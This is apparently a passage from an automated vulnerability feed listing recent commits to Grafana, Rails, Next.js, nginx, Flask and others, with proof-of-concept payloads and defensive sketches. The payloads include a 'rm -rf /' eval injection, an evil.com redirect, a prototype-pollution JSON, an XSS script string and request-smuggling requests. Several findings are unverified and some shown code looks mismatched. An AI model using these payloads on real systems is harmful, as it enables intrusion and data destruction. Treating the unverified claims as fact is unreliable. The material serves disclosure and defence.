1. Set up a malicious proxy/MITM tool like mitmproxy with a self-signed certificate
2. Configure network to route Grafana's image renderer traffic through the proxy
3. The original code would accept any certificate without validation, allowing interception of requests containing X-Auth-Token headers
4. Command: `mitmproxy -p 8080 --certs *=cert.pem` then configure Grafana to use renderer at https://malicious-renderer:8081 - the auth tokens would be captured in plaintext

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 11, 2026, 10:22 PM — rails/rails

Commit: 4c07766

Author: Mark Bastawros

The custom inspect methods in various Rails classes could potentially expose sensitive internal state or configuration data through debug output, error messages, or logs. The patch replaces these with a controlled inspection mechanism that only shows explicitly whitelisted instance variables.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or error handler:
connection = ActionCable::Connection::Base.new(server, env)
connection.instance_variable_set(:@secret_token, 'sensitive_data')
puts connection.inspect
# Before patch: Could expose @secret_token and other internals
# After patch: Only shows basic object info without sensitive variables

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 24, 2026, 09:19 AM — rails/rails

Commit: 5086622

Author: Jean Boussier

The custom inspect methods in various Rails classes exposed sensitive internal state including cryptographic keys, secrets, and other confidential data in debug output, logs, and error messages. The patch replaces custom inspect methods with a standardized approach that only shows safe instance variables, preventing accidental leakage of sensitive information.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or debug session:
encryptor = ActiveSupport::MessageEncryptor.new(SecretKey.new)
encryptor.inspect
# Before patch: Would expose the secret key in the output
# After patch: Only shows class name and object ID

# Or in ActionCable connection:
connection = ActionCable::Connection::Base.new(server, env)
connection.inspect
# Before patch: Could expose connection secrets, tokens, or session data
# After patch: Only shows safe, filtered instance variables

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 23, 2026, 04:36 PM — vercel/next.js

Commit: 45a8a82

Author: Tobias Koppers

The code had a concurrency bug where the follower's aggregation number was read without proper locking, allowing the inner-vs-follower classification decision to be made on stale data if the aggregation number changed concurrently. This could lead to incorrect task classification and potential data corruption in the aggregation system.

🔍 View Affected Code & PoC

Affected Code

let follower_aggregation_number = get_aggregation_number(&follower);
let should_be_follower = follower_aggregation_number < upper_aggregation_number;

Proof of Concept

Thread 1 reads follower's aggregation number (e.g., 10) and determines it should be a follower. Thread 2 concurrently updates the same follower's aggregation number to a higher value (e.g., 20). Thread 1 proceeds with the stale classification decision, incorrectly treating a node that should be an inner node as a follower, leading to incorrect aggregation graph structure and potential data corruption.
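The general fix pattern is to make the read and the decision atomic with respect to updates, e.g. by holding a lock across both (a generic Python sketch, not Turbopack's Rust internals; all names are illustrative):

```python
import threading

class Node:
    def __init__(self, aggregation_number):
        self.lock = threading.Lock()
        self.aggregation_number = aggregation_number

def classify(follower, upper_aggregation_number):
    # Hold the follower's lock across the read *and* the decision, so a
    # concurrent writer (which must take the same lock to update the
    # aggregation number) cannot make the classification go stale
    # between the two steps.
    with follower.lock:
        return follower.aggregation_number < upper_aggregation_number

print(classify(Node(10), 15))  # True: classified as follower
print(classify(Node(20), 15))  # False: classified as inner node
```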

⚠️ MEDIUM UNVERIFIED Open Redirect

Feb 23, 2026, 10:14 AM — grafana/grafana

Commit: e8a2b4b

Author: xavi

The ValidateRedirectTo function was vulnerable to open redirect attacks through URL fragments. Attackers could bypass path validation by using URL fragments containing dangerous patterns like '../' or '//', which were not sanitized before the redirect. The patch fixes this by validating fragments and returning a sanitized URL string instead of the original user input.

🔍 View Affected Code & PoC

Affected Code

if redirectDenyRe.MatchString(to.Path) {
	return errForbiddenRedirectTo
}
// Fragment validation was missing
return redirectTo // Original unsanitized input returned

Proof of Concept

POST /login with redirect_to cookie set to '/dashboard#//evil.com/steal' - the fragment '#//evil.com/steal' would bypass the path validation regex and could be used in client-side JavaScript to redirect users to the malicious domain
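A sketch of the hardened check: apply the deny patterns to the fragment too, and return a URL rebuilt from validated components rather than echoing the raw input (hypothetical Python analogue of the Go change; the deny regex is simplified):

```python
import re
from urllib.parse import urlsplit, urlunsplit

DENY = re.compile(r"//|\\|\.\.")   # protocol-relative, backslash, traversal

def validate_redirect_to(redirect_to):
    parts = urlsplit(redirect_to)
    if parts.scheme or parts.netloc:
        raise ValueError("absolute redirect forbidden")
    # Check the fragment as well as the path -- the missing step pre-patch.
    if DENY.search(parts.path) or DENY.search(parts.fragment):
        raise ValueError("forbidden redirect pattern")
    # Rebuild from validated components instead of echoing the raw input.
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))

print(validate_redirect_to("/dashboard#section-2"))       # /dashboard#section-2
try:
    validate_redirect_to("/dashboard#//evil.com/steal")   # fragment bypass attempt
except ValueError as e:
    print("rejected:", e)
```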

🔥 HIGH UNVERIFIED Buffer Overflow/Out-of-bounds Memory Access

Feb 23, 2026, 12:45 AM — nginx/nginx

Commit: bb8ec29

Author: CodeByMoriarty

The code failed to validate that sync sample values in MP4 stss atoms are 1-based as required by ISO 14496-12. A zero-valued stss entry caused the key_prefix calculation to exceed consumed samples, leading the backward loop in ngx_http_mp4_crop_stts_data() to walk past the beginning of the stts data buffer, causing out-of-bounds memory access.

🔍 View Affected Code & PoC

Affected Code

sample = ngx_mp4_get_32value(entry);
if (sample > start_sample) {
    break;
}
key_prefix = start_sample - sample;

Proof of Concept

Craft a malicious MP4 file with an stss atom containing a zero sync sample value (0x00000000). When nginx processes this file with mp4 module enabled and start_key_frame is on, the zero sample causes key_prefix to equal start_sample + 1, which exceeds the samples processed in the forward stts pass. This triggers the backward loop in ngx_http_mp4_crop_stts_data() to read/write beyond the stts buffer boundaries, potentially leading to memory corruption or information disclosure.
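The missing validation is simply "stss sync sample numbers are 1-based". A parser-side sketch (`parse_stss_entries` is a hypothetical helper, not nginx code):

```python
import struct

def parse_stss_entries(data):
    # stss entries are 32-bit sample numbers, 1-based per ISO 14496-12;
    # reject 0 so downstream 'start_sample - sample' arithmetic cannot
    # produce an out-of-range key_prefix.
    entries = []
    for (sample,) in struct.iter_unpack(">I", data):
        if sample == 0:
            raise ValueError("stss sync sample must be 1-based, got 0")
        entries.append(sample)
    return entries

print(parse_stss_entries(struct.pack(">3I", 1, 25, 50)))  # [1, 25, 50]
try:
    parse_stss_entries(struct.pack(">I", 0))              # malicious zero entry
except ValueError as e:
    print("rejected:", e)
```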

⚠️ MEDIUM UNVERIFIED Path Traversal

Feb 21, 2026, 04:06 AM — vercel/next.js

Commit: 632725b

Author: Sebastian "Sebbie" Silbermann

The script accepts user-provided file paths without validation and directly converts them to file URLs, allowing attackers to access arbitrary files on the system. The patch adds proper path handling using pathToFileURL() which normalizes paths and prevents directory traversal attacks.

🔍 View Affected Code & PoC

Affected Code

if (version !== null && version.startsWith('/')) {
    version = pathToFileURL(version).href
}

Proof of Concept

pnpm run sync-react --version "../../../etc/passwd" would allow reading system files outside the intended React checkout directory before the patch
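The general defense is the same regardless of language: resolve the user-supplied path against a base directory and reject anything that escapes it. A minimal Python sketch (not Next.js's actual fix, which uses pathToFileURL; the base directory here is hypothetical):

```python
# Containment check: resolve the candidate path and verify it stays inside
# the base directory before touching the filesystem.
import os

def resolve_within(base: str, user_path: str) -> str:
    base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate

# '../../../etc/passwd' resolves outside the checkout and is rejected
try:
    resolve_within("/srv/react-checkout", "../../../etc/passwd")
    escaped = True
except ValueError:
    escaped = False
assert escaped is False
```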

⚠️ MEDIUM UNVERIFIED Cross-Site Scripting (XSS)

Feb 20, 2026, 02:43 PM — django/django

Commit: 283ea9e

Author: SiHyunLee

The Django admin interface was vulnerable to XSS attacks when displaying model string representations that contained only whitespace or malicious scripts. The vulnerability occurred because whitespace-only strings were not properly sanitized before being rendered in HTML contexts, allowing attackers to inject malicious scripts through model __str__ methods.

🔍 View Affected Code & PoC

Affected Code

obj_repr = format_html('<a href="{}">{}</a>', urlquote(obj_url), obj)
# Direct use of obj without sanitization

Proof of Concept

Create a Django model with a __str__ method that returns '<script>alert("XSS")</script>' or just whitespace followed by script tags. When viewing this object in the Django admin interface, the malicious script would execute in the browser due to improper escaping of the object representation in admin templates and breadcrumbs.
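The fix idea can be shown with only the standard library: escape the object's string representation before interpolating it into markup, which mirrors what Django's format_html does for its arguments (the Evil class and admin_link helper below are illustrative):

```python
# Escaping str(obj) neutralizes a malicious __str__ payload before it
# reaches an HTML context.
from html import escape

class Evil:
    def __str__(self):
        return '<script>alert("XSS")</script>'

def admin_link(url: str, obj) -> str:
    return f'<a href="{escape(url)}">{escape(str(obj))}</a>'

link = admin_link("/admin/app/evil/1/", Evil())
assert "<script>" not in link
assert "&lt;script&gt;" in link
```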

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 20, 2026, 08:25 AM — grafana/grafana

Commit: 430abe7

Author: Georges Chaudy

The old authorization system used the deprecated Compile method, which performed authorization checks item-by-item during iteration, potentially allowing unauthorized access to resources due to race conditions or incomplete authorization state. The patch replaces this with FilterAuthorized using BatchCheck, which performs a more robust batch authorization pass before returning results.

🔍 View Affected Code & PoC

Affected Code

checker, _, err := s.access.Compile(ctx, user, claims.ListRequest{
	Group: key.Group,
	Resource: key.Resource,
	Namespace: key.Namespace,
	Verb: utils.VerbGet,
})

Proof of Concept

1. User with limited permissions makes concurrent List requests for resources they shouldn't access
2. During the item-by-item authorization check in the old code, if authorization state changes between checks or there's a race condition, some unauthorized items could pass through the checker
3. Attacker could potentially access resources in folders/namespaces they don't have permissions for by exploiting timing windows in the deprecated Compile authorization flow

⚠️ MEDIUM UNVERIFIED Stack Overflow DoS

Feb 20, 2026, 04:48 AM — vercel/next.js

Commit: ca0957d

Author: Josh Story

The unhandled rejection filter module was being bundled twice, causing mutual recursion when handling unhandled Promise rejections. Each instance captured the other's handler, creating an infinite loop that would overflow the stack and crash the server on any unhandled rejection.

🔍 View Affected Code & PoC

Affected Code

function filteringUnhandledRejectionHandler(reason, promise) {
  // Handler gets called recursively between two instances
  // No guards to prevent infinite recursion
}

Proof of Concept

// Trigger an unhandled Promise rejection in a Next.js server with the vulnerable setup
Promise.reject(new Error('test rejection'));
// This would cause infinite recursion between the two installed handlers,
// eventually overflowing the call stack and crashing the Node.js process
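The double-bundling failure mode can be demonstrated in a few lines of Python: two copies of the "same" handler that each delegate to the other recurse until the stack limit (the registry structure is illustrative, not Next.js's):

```python
# Two instances of one handler module, each forwarding to the other with
# no recursion guard -- a single event exhausts the stack.
import sys

def make_handler(registry):
    def handler(reason, depth=0):
        other = registry[1 - registry.index(handler)]
        return other(reason, depth + 1)
    return handler

registry = []
registry.append(make_handler(registry))  # first bundled copy
registry.append(make_handler(registry))  # second bundled copy

sys.setrecursionlimit(500)  # keep the demo quick
try:
    registry[0]("unhandled rejection")
    crashed = False
except RecursionError:
    crashed = True
assert crashed is True
```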

⚠️ MEDIUM CONFIRMED Hash Collision

Feb 19, 2026, 06:22 PM — grafana/grafana

Commit: 6d3440a

Author: beejeebus

The code was truncating SHA256 hashes to only 10 hex characters when generating secret names, shrinking the name space to 16^10 (~1.1 trillion) values. By the birthday bound, two attacker-chosen field names collide after roughly 2^20 (~1 million) attempts. This allows attackers to craft field names that collide with existing secret field names, potentially accessing or modifying secrets they shouldn't have access to.

🔍 View Affected Code & PoC

Affected Code

h := sha256.New()
h.Write([]byte(dsUID))
h.Write([]byte("|"))
h.Write([]byte(key))
n := hex.EncodeToString(h.Sum(nil))
return apistore.LEGACY_DATASOURCE_SECURE_VALUE_NAME_PREFIX + n[0:10]

Proof of Concept

1. Target an existing secret with field name 'password' for dsUID 'abc123' (generates a truncated name like 'lds-sv-0d27eff323')
2. Brute-force field names until one hashes to the same 10-character prefix; matching a specific known prefix takes on the order of 16^10 (~1.1 trillion) SHA256 computations, feasible on GPU hardware, while colliding any two attacker-chosen names takes only ~1 million attempts by the birthday bound
3. Find a colliding field name such as 'malicious_field_xyz' that also produces 'lds-sv-0d27eff323'
4. Create a datasource with the colliding field name to access/overwrite the legitimate 'password' secret
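The birthday effect is easy to see empirically. This sketch truncates to an extreme 4 hex characters (16^4 = 65,536 slots) so a collision appears immediately; the same math at 10 characters puts collisions at roughly a million attempts:

```python
# Demonstrates why short hash truncations collide: with 65,536 possible
# 4-char prefixes, the birthday bound predicts a collision after ~300 names.
import hashlib

def truncated_name(ds_uid: str, key: str, length: int) -> str:
    h = hashlib.sha256(f"{ds_uid}|{key}".encode()).hexdigest()
    return h[:length]

seen = {}
collision = None
for i in range(200_000):  # pigeonhole guarantees a hit well before this
    name = truncated_name("abc123", f"field_{i}", 4)
    if name in seen:
        collision = (seen[name], f"field_{i}")
        break
    seen[name] = f"field_{i}"

assert collision is not None
```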

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 19, 2026, 04:37 PM — facebook/react

Commit: f247eba

Author: Tim Neutkens

The original code used JSON.parse with a reviver function that could potentially allow __proto__ property manipulation during RSC payload deserialization. The patch explicitly deletes __proto__ keys during the walking phase and moves away from the reviver approach to prevent prototype pollution attacks.

🔍 View Affected Code & PoC

Affected Code

return JSON.parse(json, response._fromJSON);
// where _fromJSON reviver processes all key-value pairs including __proto__

Proof of Concept

Send RSC payload with malicious JSON: {"__proto__": {"polluted": true, "isAdmin": true}} - this could pollute Object.prototype during the reviver processing before parseModelString filters are applied, potentially affecting application logic that checks object properties.
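Python dictionaries don't share JavaScript's prototype-chain hazard, but the patch's strategy — walk the parsed tree and drop `__proto__` keys rather than trusting a reviver — translates directly. A hedged sketch of that walking phase:

```python
# Recursively strip "__proto__" keys from a parsed JSON tree, mirroring the
# patch's explicit-delete approach (the scrub_proto helper is illustrative).
import json

def scrub_proto(value):
    if isinstance(value, dict):
        value.pop("__proto__", None)
        for v in value.values():
            scrub_proto(v)
    elif isinstance(value, list):
        for v in value:
            scrub_proto(v)
    return value

payload = '{"__proto__": {"isAdmin": true}, "nested": {"__proto__": {"x": 1}, "ok": 2}}'
data = scrub_proto(json.loads(payload))
assert "__proto__" not in data
assert "__proto__" not in data["nested"]
assert data["nested"]["ok"] == 2
```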

⚠️ MEDIUM UNVERIFIED HTTP Response Splitting / Cache Poisoning

Feb 19, 2026, 03:02 AM — pallets/flask

Commit: c17f379

Author: David Lord

The session was not properly marked as accessed when only reading session metadata (keys, length checks), allowing responses to be cached without the Vary: Cookie header. This could lead to cache poisoning where one user's cached response is served to another user, potentially exposing session-dependent data.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

def get(self, key: str, default: t.Any = None) -> t.Any:
    self.accessed = True
    return super().get(key, default)

Proof of Concept

1. User A visits `/check` endpoint that does `if 'admin' in session:` (metadata access only)
2. Response cached without Vary: Cookie header since session.accessed stays False
3. User B (different session) visits same endpoint, gets User A's cached response
4. User B sees content based on User A's session state instead of their own session
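The root cause fits in a small Python sketch: a session wrapper that flags access in `__getitem__`/`get` but forgets metadata operations like `__contains__` and `__len__`, so `'admin' in session` leaves `accessed` False and the Vary: Cookie header is never added (this is a simplified stand-in, not Flask's actual class):

```python
# Minimal session model: the fix is that metadata reads must also count
# as access, so caching layers know the response depends on the cookie.
class Session(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.accessed = False

    def __getitem__(self, key):
        self.accessed = True
        return super().__getitem__(key)

    # Pre-patch, these two were missing -- 'x in session' and len(session)
    # left accessed False.
    def __contains__(self, key):
        self.accessed = True
        return super().__contains__(key)

    def __len__(self):
        self.accessed = True
        return super().__len__()

s = Session(user_id=42)
_ = "admin" in s            # metadata-only read
assert s.accessed is True   # with the fix, Vary: Cookie will be emitted
```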

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 03:35 AM — pallets/flask

Commit: 089cb86

Author: David Lord

The session was not being marked as accessed when only checking keys/metadata, allowing caching proxies to cache pages for different users. This could lead to session data being served to wrong users through shared caches. The patch fixes this by tracking session access at the request context level.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

Proof of Concept

1. User A logs in and visits /profile (session contains user data)
2. Caching proxy caches the response without Vary: Cookie header
3. User B visits /profile and gets User A's cached profile data
4. This occurs because operations like 'username' in session or len(session) didn't set accessed=True, so no Vary header was added

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 05:56 AM — pallets/flask

Commit: daca74d

Author: David Lord

The session was not being marked as accessed when only reading operations like checking keys or length occurred, causing the 'Vary: Cookie' header to not be set. This could allow caching proxies to serve the same cached response to different users, potentially leaking session-dependent data between users.

🔍 View Affected Code & PoC

Affected Code

def session(self) -> SessionMixin:
    if self._session is None:
        self._session = si.make_null_session(self.app)
    return self._session

Proof of Concept

User A visits `/profile` which checks `if 'user_id' in session:` and returns personalized data. Caching proxy caches this response without Vary: Cookie header. User B visits same URL and receives User A's cached personal data because session wasn't marked as accessed during the `in` operation.

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 19, 2026, 12:58 PM — grafana/grafana

Commit: b0d812f

Author: Rafael Bortolon Paulovic

The code had a race condition vulnerability during database migrations where concurrent writes to legacy tables could occur during unified storage migrations in rolling upgrade scenarios. This could lead to data corruption or inconsistent state as multiple processes could simultaneously modify the same database tables without proper synchronization.

🔍 View Affected Code & PoC

Affected Code

Resources: []migrations.ResourceInfo{
	{GroupResource: folderGR, LockTable: "folder"},
	{GroupResource: dashboardGR, LockTable: "dashboard"},
}

Proof of Concept

During a rolling upgrade, start a unified storage migration for dashboards while simultaneously having another Grafana instance write to the dashboard table. The race condition occurs when: 1) Migration process reads dashboard data from legacy tables, 2) Another instance modifies the same dashboard record, 3) Migration process writes to unified storage based on stale data, resulting in data loss or corruption of the dashboard modifications made in step 2.

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 19, 2026, 10:06 AM — grafana/grafana

Commit: d2b5d7a

Author: Georges Chaudy

The code had a fallback authentication mechanism that would allow any request to bypass authorization checks when the primary authenticator failed. The fallback would accept requests with only namespace validation, effectively allowing unauthorized access to resources.

🔍 View Affected Code & PoC

Affected Code

newCtx, err = f.fallback(ctx)
if newCtx != nil {
    newCtx = resource.WithFallback(newCtx)
}
f.metrics.requestsTotal.WithLabelValues("true", fmt.Sprintf("%t", err == nil)).Inc()
return newCtx, err

Proof of Concept

Send a gRPC request to the unified storage service with malformed or missing authentication headers that would cause the primary authenticator to fail. The fallback authenticator would then activate, and any subsequent resource access request with a valid namespace (e.g., namespace: "some-valid-namespace") would be granted access regardless of actual user permissions, bypassing RBAC controls entirely.

⚠️ MEDIUM UNVERIFIED Access Control Bypass

Feb 18, 2026, 10:25 PM — grafana/grafana

Commit: 1bf8245

Author: Mihai Turdean

The scope resolver cache was not invalidated when datasources were deleted, causing stale name-to-UID mappings. When a datasource was deleted and a new one created with the same name, the cached entry would resolve to the deleted datasource's UID, leading to incorrect authorization decisions. The patch fixes this by invalidating the cache entry for the datasource name scope during deletion.

🔍 View Affected Code & PoC

Affected Code

// Before patch - no cache invalidation in deletion handlers
hs.Live.HandleDatasourceDelete(c.GetOrgID(), ds.UID)
return response.Success("Data source deleted")

Proof of Concept

1. Create datasource 'test-ds' with UID 'uid-123' (cache stores test-ds -> uid-123)
2. Delete datasource 'test-ds' (cache still has stale test-ds -> uid-123)
3. Create new datasource 'test-ds' with UID 'uid-456'
4. Access control checks for 'test-ds' resolve to deleted UID 'uid-123' instead of current 'uid-456', potentially allowing unauthorized access or denying legitimate access
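The stale-mapping lifecycle above can be modeled in a few lines (a simplified stand-in, not Grafana's resolver): without the `pop()` in `delete`, the resolver keeps returning the dead datasource's UID.

```python
# Name->UID resolver with a cache; the patch adds invalidation on delete.
class ScopeResolver:
    def __init__(self):
        self.db = {}      # name -> uid (source of truth)
        self.cache = {}   # name -> uid (resolver cache)

    def create(self, name, uid):
        self.db[name] = uid

    def resolve(self, name):
        if name not in self.cache:
            self.cache[name] = self.db[name]
        return self.cache[name]

    def delete(self, name):
        del self.db[name]
        self.cache.pop(name, None)  # the fix: drop the stale mapping

r = ScopeResolver()
r.create("test-ds", "uid-123")
assert r.resolve("test-ds") == "uid-123"
r.delete("test-ds")
r.create("test-ds", "uid-456")
# Without the pop() above, this would still resolve the deleted 'uid-123'.
assert r.resolve("test-ds") == "uid-456"
```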

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 18, 2026, 10:33 PM — grafana/grafana

Commit: ba0f62a

Author: beejeebus

The code exposed encrypted datasource secrets even when they were empty, potentially leaking secret metadata or encrypted empty values to unauthorized users. The patch fixes this by filtering out empty secrets before returning them in API responses.

🔍 View Affected Code & PoC

Affected Code

return q.converter.AsDataSource(ds)

Proof of Concept

GET /api/datasources/{uid} - An attacker with read access could retrieve a datasource configuration and see references to all configured secret fields (even empty ones) in the SecureJsonData map, potentially revealing what secret fields are configured and their encrypted empty values, which could aid in further attacks or reveal system configuration details.

⚠️ MEDIUM UNVERIFIED Denial of Service / Resource Exhaustion

Feb 18, 2026, 04:53 PM — vercel/next.js

Commit: c885d48

Author: Zack Tanner

The code had a missing size check for postponed request bodies in self-hosted setups, allowing attackers to send arbitrarily large payloads that would consume server memory and potentially crash the application. The patch ensures maxPostponedStateSize is consistently enforced across all code paths that buffer postponed bodies.

🔍 View Affected Code & PoC

Affected Code

const body: Array<Buffer> = []
for await (const chunk of req) {
  body.push(chunk)
}
const postponed = Buffer.concat(body).toString('utf8')

Proof of Concept

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
next-resume: 1
Content-Length: 1073741824

[1GB of 'A' characters]

This would cause the server to buffer the entire 1GB payload in memory without any size validation, leading to memory exhaustion and potential DoS.
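The mitigation the patch enforces is the standard bounded-read pattern: cap bytes buffered from the stream and abort once the cap is exceeded, instead of concatenating unboundedly. A Python sketch (the 1 MiB limit is illustrative, not Next.js's maxPostponedStateSize value):

```python
# Read a stream in chunks, failing fast once the running total passes the cap.
import io

MAX_POSTPONED_STATE_SIZE = 1024 * 1024  # 1 MiB, illustrative

def read_bounded(stream, limit=MAX_POSTPONED_STATE_SIZE) -> bytes:
    chunks, total = [], 0
    while True:
        chunk = stream.read(64 * 1024)
        if not chunk:
            return b"".join(chunks)
        total += len(chunk)
        if total > limit:
            raise ValueError("postponed body exceeds size limit")
        chunks.append(chunk)

oversized = io.BytesIO(b"A" * (2 * 1024 * 1024))
try:
    read_bounded(oversized)
    rejected = False
except ValueError:
    rejected = True
assert rejected is True
```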

⚠️ MEDIUM CONFIRMED Information Disclosure

Feb 18, 2026, 11:55 AM — grafana/grafana

Commit: a6a74c5

Author: Matheus Macabu

The audit logging configuration was exposing sensitive data source request and response bodies by default. This could lead to credentials, API keys, and sensitive query data being logged in plaintext audit files accessible to system administrators.

🔍 View Affected Code & PoC

Affected Code

log_datasource_query_request_body = true
log_datasource_query_response_body = true

Proof of Concept

1. Configure a data source with API key in headers (e.g., Prometheus with `Authorization: Bearer secret-token`)
2. Execute query: `up{job="mysql"}`
3. Check audit logs - they would contain: `"request_body":{"headers":{"Authorization":"Bearer secret-token"}}` and full response data including potentially sensitive metrics values

🔥 HIGH CONFIRMED Authorization Bypass

Feb 17, 2026, 03:51 PM — grafana/grafana

Commit: 0c82488

Author: Gabriel MABILLE

The rolebindings API was accessible to all authenticated users without proper authorization checks. This allowed any user to potentially view, modify, or create role bindings, leading to privilege escalation. The patch restricts access to only access policy identities.

🔍 View Affected Code & PoC

Affected Code

if a.GetResource() == "rolebindings" {
    return resourceAuthorizer.Authorize(ctx, a)
}

Proof of Concept

A regular user could make API calls to the rolebindings endpoint (e.g., GET /api/iam/rolebindings or POST /api/iam/rolebindings) with their normal user credentials to access or modify role bindings they shouldn't have access to, potentially escalating their privileges by binding themselves to administrative roles.

⚠️ MEDIUM UNVERIFIED HTTP Request Smuggling / Content Length Mismatch

Jan 30, 2026, 01:06 PM — nginx/nginx

Commit: ec714d5

Author: Sergey Kandaurov

The vulnerability allows attackers to cause a mismatch between the Content-Length header sent to SCGI backends and the actual request body size in unbuffered mode, desynchronizing nginx and the backend and enabling HTTP request smuggling attacks.

🔍 View Affected Code & PoC

Affected Code

body = r->upstream->request_bufs;
while (body) {
    content_length_n += ngx_buf_size(body->buf);
    body = body->next;
}

Proof of Concept

Send a chunked POST request to nginx with SCGI backend in unbuffered mode:
POST /scgi-endpoint HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 100

5
hello
0

The recalculated body size (5 bytes) differs from original Content-Length (100 bytes), causing the SCGI backend to expect more data than nginx sends, leading to request desynchronization.

🔥 HIGH CONFIRMED Code Injection

Feb 16, 2026, 02:59 PM — nodejs/node

Commit: 4d867af

Author: Shelley Vohr

The code used eval() to parse configuration data, which allows arbitrary Python code execution if an attacker can control the node_builtin_shareable_builtins configuration value. The patch replaces eval() with json.loads() to safely parse JSON data.

🔍 View Affected Code & PoC

Affected Code

eval(config['node_builtin_shareable_builtins'])

Proof of Concept

An attacker could set node_builtin_shareable_builtins to '__import__("os").system("rm -rf /")' which would execute arbitrary shell commands when eval() processes it during the build configuration generation.
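The difference between the two parsers is exactly the fix: json.loads treats its input purely as data, while eval executes it. A string eval would run as code is a plain parse error for the JSON parser (the payload below is a harmless stand-in):

```python
# json.loads rejects executable expressions instead of running them.
import json

malicious = '__import__("os").getcwd()'   # harmless stand-in for a payload
safe = '["fs", "path", "util"]'

try:
    json.loads(malicious)
    parsed_malicious = True
except json.JSONDecodeError:
    parsed_malicious = False

assert parsed_malicious is False          # code is rejected, not executed
assert json.loads(safe) == ["fs", "path", "util"]
```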

⚠️ MEDIUM CONFIRMED Authorization Bypass

Feb 16, 2026, 09:59 AM — grafana/grafana

Commit: bcc238c

Author: Misi

The endpoint allowed any authenticated user to access team member information without proper authorization checks. The patch adds a permission check requiring 'GetPermissions' verb on the Team resource before returning member data.

🔍 View Affected Code & PoC

Affected Code

// No authorization check before returning team members
result, err := s.client.Search(ctx, searchRequest)
if err != nil {
    responder.Error(err)
    return
}

Proof of Concept

An authenticated user without team permissions could call GET /api/teams/{team-id}/members to retrieve sensitive member information for any team they shouldn't have access to, potentially exposing user associations and team structure across the organization.

⚠️ MEDIUM UNVERIFIED Resource Deletion Bypass

Feb 16, 2026, 07:36 AM — grafana/grafana

Commit: 3f65188

Author: Daniele Stefano Ferru

The code allowed updating Repository resources to remove all finalizers, which would cause immediate deletion without proper cleanup when the resource is later deleted. This bypasses the intended cleanup workflow and could lead to orphaned resources or incomplete cleanup operations.

🔍 View Affected Code & PoC

Affected Code

if len(r.Finalizers) == 0 && a.GetOperation() == admission.Create {
    r.Finalizers = []string{
        RemoveOrphanResourcesFinalizer,
        CleanFinalizer,
    }
}

Proof of Concept

1. Create a Repository resource (finalizers are added automatically)
2. Update the Repository with an empty finalizers array: `kubectl patch repository myrepo --type='merge' -p='{"metadata":{"finalizers":[]}}'`
3. Delete the Repository: `kubectl delete repository myrepo`
4. The resource is immediately deleted without cleanup, bypassing the controller's cleanup logic and potentially leaving orphaned resources

⚠️ MEDIUM UNVERIFIED Authorization Bypass

Feb 16, 2026, 07:30 AM — grafana/grafana

Commit: 45f14bc

Author: Gonzalo Trigueros Manzanas

The files API endpoints were not enforcing quota limits, allowing authenticated users to bypass resource quotas and create unlimited files/dashboards. This could lead to resource exhaustion and denial of service. The patch adds quota checks before allowing POST/PUT operations on files.

🔍 View Affected Code & PoC

Affected Code

func (c *filesConnector) handleRequest(ctx context.Context, name string, r *http.Request, info rest.ConnectRequest) (http.Handler, error) {
	// Missing quota enforcement for write operations
	obj, err := c.handleMethodRequest(ctx, r, opts, isDir, dualReadWriter)
}

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/test-repo/files/dashboard1.json with valid auth token and dashboard JSON payload. Repeat requests beyond the configured quota limit (e.g., if quota is 10 resources, make 15+ POST requests creating new files). Before the patch, all requests would succeed despite exceeding quota, potentially exhausting disk space or overwhelming the system.

⚠️ MEDIUM UNVERIFIED Data Integrity Violation

Feb 13, 2026, 10:54 PM — rails/rails

Commit: 1a4305d

Author: Joshua Huber

The Deduplicable module incorrectly treated virtual (generated) columns and regular columns as identical when they had the same name and type, causing regular columns to be silently excluded from INSERT/UPDATE operations. This resulted in NULL values being stored instead of the intended data, leading to silent data corruption.

🔍 View Affected Code & PoC

Affected Code

def ==(other)
  other.is_a?(Column) &&
    super &&
    auto_increment? == other.auto_increment?
end

Proof of Concept

1. Create a table with a virtual column named 'name'
2. Create another table with a regular column named 'name' of same type
3. Access virtual column first to register it in deduplication cache
4. Attempt INSERT on regular table: MyModel.create!(name: 'test_data')
5. The 'name' field will be NULL in database instead of 'test_data' due to column deduplication treating regular column as virtual
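The equality bug generalizes: a deduplication cache keyed on an equality that omits a distinguishing field will silently substitute one object for another. A Python sketch with a hypothetical Column class (the Rails patch adds the virtual flag to `==`/`hash` in the same spirit):

```python
# Dedup cache keyed on (name, type) conflates virtual and regular columns;
# adding the virtual flag to the key keeps them distinct.
from dataclasses import dataclass

@dataclass(frozen=True)
class Column:
    name: str
    sql_type: str
    virtual: bool = False

buggy_key = lambda c: (c.name, c.sql_type)             # ignores virtual
fixed_key = lambda c: (c.name, c.sql_type, c.virtual)  # the fix

virtual_col = Column("name", "varchar", virtual=True)
regular_col = Column("name", "varchar", virtual=False)

cache = {buggy_key(virtual_col): virtual_col}
deduped = cache.get(buggy_key(regular_col), regular_col)
assert deduped.virtual is True   # regular column silently became virtual

cache = {fixed_key(virtual_col): virtual_col}
deduped = cache.get(fixed_key(regular_col), regular_col)
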